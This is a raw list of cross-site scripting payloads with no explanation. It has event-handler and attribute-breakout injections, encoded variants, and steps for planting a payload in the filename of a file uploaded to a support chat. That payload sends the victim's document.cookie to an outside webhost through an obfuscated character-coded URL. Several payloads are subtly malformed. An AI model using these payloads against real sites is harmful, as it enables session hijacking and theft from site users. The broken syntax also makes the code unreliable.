';"/> <Img src=X onerror=alert(Hooray)>

<img src=x onerror=alert(1)> 

"><svg onload=alert(1)>

"onmouseover="alert(1)

'-alert(1)-'

"><a onmouseover="alert(document.cookie)">xxs link</a>

['-alert(document.cookie)-']

"><img src=x onerror=prompt(document.domain)>


upload a file to the support chat
change the filename to \"><img src=1 onerror=\"url=String104,116,116,112,115,58,47,47,103,97,116,111,108,111,117,99,111,46,48,48,48,119,101,98,104,111,115,116,97,112,112,46,99,111,109,47,99,115,109,111,110,101,121,47,105,110,100,101,120,46,112,104,112,63,116,111,107,101,110,115,61+encodeURIComponent(document['cookie']);xhttp=&#x20new&#x20XMLHttpRequest();xhttp'GET',url,true;xhttp'send';


<script src=//mysite.com?c=
%00<script>alert(1)</script>

<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >

Encoded Payload
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

Clean Payload
"><track/onerror='confirm1'>
